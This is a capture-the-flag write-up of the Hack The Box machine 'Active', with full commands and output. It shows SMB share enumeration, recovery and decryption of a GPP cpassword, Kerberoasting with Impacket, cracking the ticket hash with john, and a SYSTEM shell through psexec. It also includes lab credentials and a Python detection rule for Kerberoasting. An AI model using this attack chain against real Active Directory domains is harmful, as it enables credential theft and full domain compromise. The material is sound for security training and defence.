Introduction
Hi, I'm a hopelessly weak wannabe engineer.
This post is a write-up of my attempt at "Active" on Hack The Box (see the link below).
Note: this post does not go into detail on things like tool usage the way earlier ones did, so please bear with me.
Note: please do not misuse this. Use these techniques only to contribute to society, because otherwise you will be breaking the law.
Discovery
Port scan
This time I tried a fast scan with RustScan.
┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.10.10.100 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.100:53
Open 10.10.10.100:88
Open 10.10.10.100:135
Open 10.10.10.100:139
Open 10.10.10.100:389
Open 10.10.10.100:445
Open 10.10.10.100:464
Open 10.10.10.100:593
Open 10.10.10.100:636
Open 10.10.10.100:5722
Open 10.10.10.100:9389
Open 10.10.10.100:49152
Open 10.10.10.100:49153
Open 10.10.10.100:49155
Open 10.10.10.100:49154
Open 10.10.10.100:49157
Open 10.10.10.100:49158
Open 10.10.10.100:49165
Open 10.10.10.100:49170
Open 10.10.10.100:49171
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:50 EDT
Initiating Ping Scan at 05:50
Scanning 10.10.10.100 [4 ports]
Completed Ping Scan at 05:50, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:50
Completed Parallel DNS resolution of 1 host. at 05:50, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:50
Scanning 10.10.10.100 [20 ports]
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 49170/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 49171/tcp on 10.10.10.100
Completed SYN Stealth Scan at 05:50, 0.41s elapsed (20 total ports)
Nmap scan report for 10.10.10.100
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2023-07-27 05:50:19 EDT for 0s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
5722/tcp open msdfsr syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49152/tcp open unknown syn-ack ttl 127
49153/tcp open unknown syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49165/tcp open unknown syn-ack ttl 127
49170/tcp open unknown syn-ack ttl 127
49171/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds
Raw packets sent: 24 (1.032KB) | Rcvd: 21 (908B)
Looks like a Windows environment. Lots of ports are open, so let's gather information.
I also run the LDAP script to quickly grab information about the AD environment.
┌──(root㉿kali)-[~/work]
└─# nmap -p 389 -n -Pn 10.10.10.100 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:51 EDT
Nmap scan report for 10.10.10.100
Host is up (0.18s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20230727095104.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
| namingContexts: DC=active,DC=htb
| namingContexts: CN=Configuration,DC=active,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
| namingContexts: DC=DomainDnsZones,DC=active,DC=htb
| namingContexts: DC=ForestDnsZones,DC=active,DC=htb
| defaultNamingContext: DC=active,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
| configurationNamingContext: CN=Configuration,DC=active,DC=htb
| rootDomainNamingContext: DC=active,DC=htb
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 114787
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: DC.active.htb
| ldapServiceName: active.htb:dc$@ACTIVE.HTB
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 4
| forestFunctionality: 4
|_ domainControllerFunctionality: 4
Service Info: Host: DC; OS: Windows 2008 R2
Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
From the dnsHostName: DC.active.htb entry we now know the domain.
Collection
rpcclient
Try whether enumeration over RPC works.
┌──(root㉿kali)-[~/work]
└─# rpcclient 10.10.10.100 -U '' -N
rpcclient $> enumdomains
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $>
Nothing.
nmap-vuln
Out of desperation, I run the vuln scripts.
┌──(root㉿kali)-[~/work]
└─# nmap -Pn 10.10.10.100 --script vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:53 EDT
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.21s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 413.14 seconds
Nothing!! Absolutely nothing came of it!!!
SMB
Port 445 is open, so let's explore around there.
Run the nmap scripts. First, basic information enumeration.
┌──(root㉿kali)-[~/work]
└─# nmap -p 445 -n -Pn 10.10.10.100 --script smb-protocols,smb-os-discovery,smb-enum-shares,smb-enum-users,smb-enum-services
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 05:53 EDT
Nmap scan report for 10.10.10.100
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2:0:2
|_ 2:1:0
Nmap done: 1 IP address (1 host up) scanned in 12.72 seconds
Nothing usable came out.
So let's see if I can actually get in.
┌──(root㉿kali)-[~/work]
└─# smbclient -N -L \\\\10.10.10.100
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Oh, there's something interesting in the share listing.
Can I get into Users?
┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.10.10.100\\Users
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
No luck. Then Replication it is!
┌──(root㉿kali)-[~/work]
└─# smbclient -N \\\\10.10.10.100\\Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 278872 blocks available
Ah, this looks like the first thing to investigate.
I'll grab the whole folder.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (3.5 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.7 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1.4 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (4.7 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \>
Alright, let's start investigating.
Credential Access
GPP
Digging through the pulled-down tree, various Group Policy-looking files turn up here and there.
Among them I found the following file.
┌──(root㉿kali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Oh, I can see a username and a GPP credential. I recall this being the one that is AES-encrypted.
A quick search shows there is a handy command that can decrypt it, so let's try it.
It seems to have recovered it fine. For background on this, please refer to the article below.
So let's use this to get access.
Shell
As usual, try accessing via WinRM.
┌──(root㉿kali)-[~/work]
└─# evil-winrm -i 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.100" port 5985 (10.10.10.100:5985)
Error: Exiting with code 1
Huh?? It says no.
Because the port isn't open? Then smbexec... that failed too.
Maybe the shares I can see are limited?? Check with smbmap.
┌──(root㉿kali)-[~/work]
└─# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Looks like it. The Users share seems accessible, so let's go in there.
┌──(root㉿kali)-[~/work]
└─# smbclient -U svc_tgs \\\\10.10.10.100\\Users
Password for [WORKGROUP\svc_tgs]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
5217023 blocks of size 4096. 278856 blocks available
smb: \>
I'm in. Let's explore.
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
5217023 blocks of size 4096. 278856 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Thu Jul 27 00:35:21 2023
5217023 blocks of size 4096. 278856 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \SVC_TGS\Desktop\>
Got the user flag! I never expected not to get a full shell... privesc is going to be painful...
Privilege Escalation
RustHound
Let's try a tool that can enumerate remotely.
RustHound, please do your thing!!!
┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d active.htb -i 10.10.10.100 -u 'SVC_TGS@active.htb' -p 'GPPstillStandingStrong2k18' -o '/tmp/htb' -z
---------------------------------------------------
Initializing RustHound at 10:54:41 on 07/27/23
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2023-07-27T10:54:41Z INFO rusthound] Verbosity level: Info
[2023-07-27T10:54:41Z INFO rusthound::ldap] Connected to ACTIVE.HTB Active Directory!
[2023-07-27T10:54:41Z INFO rusthound::ldap] Starting data collection...
[2023-07-27T10:54:43Z INFO rusthound::ldap] All data collected for NamingContext DC=active,DC=htb
[2023-07-27T10:54:43Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2023-07-27T10:54:43Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2023-07-27T10:54:43Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2023-07-27T10:54:43Z INFO rusthound::json::checker] Starting checker to replace some values...
[2023-07-27T10:54:43Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 5 users parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 49 groups parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 1 computers parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 1 ous parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 1 domains parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 2 gpos parsed!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] 21 containers parsed!
RustHound Enumeration Completed at 10:54:43 on 07/27/23! Happy Graphing!
[2023-07-27T10:54:43Z INFO rusthound::json::maker] /tmp/htb/20230727105443_active-htb_rusthound.zip created!
Good! At least enumeration over LDAP seems to work!!
Next, start neo4j and BloodHound.
┌──(root㉿kali)-[~/work]
└─# neo4j console
┌──(root㉿kali)-[~]
└─# bloodhound
Import the generated ZIP and take a look.
There is no good path.
But continuing the investigation, I noticed an interesting entry.
It looks like an SPN is set on the Administrator account. So is this the flow where you extract a hash from the service ticket issued by the TGS and Kerberoast it??
Check from the SVC_TGS perspective too.
It has the GenericAll permission, so easy. It's practically telling me to Kerberoast!
Ah, so that's why the username, lol
Kerberoasting
Use Impacket's GetUserSPNs to obtain the service ticket, and extract the hash at the same time.
┌──(root㉿kali)-[~/work]
└─# impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request -save -outputfile tgs.hash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-07-27 00:35:28.078171
Check what was extracted.
┌──(root㉿kali)-[~/work]
└─# ls -lta
total 138784
drwxr-xr-x 3 root root 4096 Jul 27 07:23 .
-rw-r--r-- 1 root root 1190 Jul 27 07:23 Administrator.ccache
-rw-r--r-- 1 root root 1878 Jul 27 07:23 tgs.hash
drwx------ 16 root root 4096 Jul 27 06:55 ..
-rw-r--r-- 1 root root 34 Jul 27 06:19 user.txt
-rw-r--r-- 1 root root 87 Jul 27 06:11 hash
-rw-r--r-- 1 root root 139921507 Jul 27 06:11 rockyou.txt
drwxr-xr-x 5 root root 4096 Jul 27 06:01 active.htb
┌──(root㉿kali)-[~/work]
└─# cat tgs.hash
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$faefbe2975e30ebfde3caf0f771ec678$...
Crack this hash with John.
Please!!!
┌──(root㉿kali)-[~/work]
└─# john --wordlist=./rockyou.txt tgs.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:06 DONE (2023-07-27 07:24) 0.1443g/s 1520Kp/s 1520Kc/s 1520KC/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Got it! Victory!!!
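What john just loaded was an RC4 (etype 23) service ticket for a user account's SPN, requested by SVC_TGS. That is exactly what a domain controller records in event 4769, and it is the signal a detection engineer watches for. The rules below are an added example, not from the post or any tool on it; the 4769 records are constructed (field names mirror the event schema, the accounts are the post's, the client IP and timestamps are invented).

```python
# Flag Kerberoasting-style service-ticket requests in Windows 4769 events.
# Added example for this write-up, not from the post or any tool it uses.
# SAMPLE_4769 is constructed: the post's accounts, invented times and client IP.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the "$krb5tgs$23$" ticket family john loaded above

# "service" is the 4769 Service Name, i.e. the account that owns the SPN.
SAMPLE_4769 = [
    {"time": "2023-07-27T11:23:01", "account": "SVC_TGS@ACTIVE.HTB",
     "service": "Administrator", "etype": RC4_HMAC, "ip": "10.10.14.5"},
    {"time": "2023-07-27T11:23:02", "account": "SVC_TGS@ACTIVE.HTB",
     "service": "DC$", "etype": 0x12, "ip": "10.10.14.5"},
    {"time": "2023-07-27T11:20:00", "account": "DC$@ACTIVE.HTB",
     "service": "krbtgt", "etype": 0x12, "ip": "10.10.10.100"},
]


def is_user_spn(service):
    """True when the SPN belongs to a user account: machine accounts end in '$'
    and krbtgt is the KDC itself, neither of which is roasted offline."""
    name = service.split("/")[0].strip()
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_user_ticket_requests(events):
    """Single-event rule: an RC4 ticket for a user-account SPN. Domains that
    have moved to AES only issue RC4 when the account or client asks for it."""
    return [e for e in events
            if e["etype"] == RC4_HMAC and is_user_spn(e["service"])]


def spn_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Volume rule: one account requesting tickets for many distinct user SPNs
    inside `window`, the shape of a bulk 'request every SPN' run. Returns
    {account: distinct_spn_count} for accounts that cross the threshold."""
    per_account = defaultdict(list)
    for e in events:
        if is_user_spn(e["service"]):
            per_account[e["account"]].append(
                (datetime.fromisoformat(e["time"]), e["service"]))
    hits = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (t0, _service) in enumerate(reqs):  # slide the window over sorted times
            seen = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(seen) >= threshold:
                hits[account] = len(seen)
                break
    return hits
```

On a domain still at the 2008 R2 functional level this box runs, RC4 tickets are routine, so the single-event rule is noisy on its own; pair it with the burst rule and with what the requesting account normally touches.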
Just to be sure, check whether I can access it.
┌──(root㉿kali)-[~/work]
└─# smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968
[+] IP: 10.10.10.100:445 Name: active.htb
[\] Work[!] Unable to remove test directory at \\10.10.10.100\SYSVOL\CRZDFMTGXJ, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
With this permission on ADMIN$, smbexec or psexec should work!
Let's try.
┌──(root㉿kali)-[~/work]
└─# impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file pAQhNxnp.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service SwHh on 10.10.10.100.....
[*] Starting service SwHh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32> whoami
nt authority\system
Administrator privileges obtained!!!
Summary
This time I tackled a retired machine that had become free. Windows machines are rare, so that's appreciated.
It was a tough box that forced me into an incomplete shell over SMB. I realized I need to prepare enumeration methods for privilege escalation in that situation. SMB shells are hard to work with.
As always, I hope this helps fellow security engineers.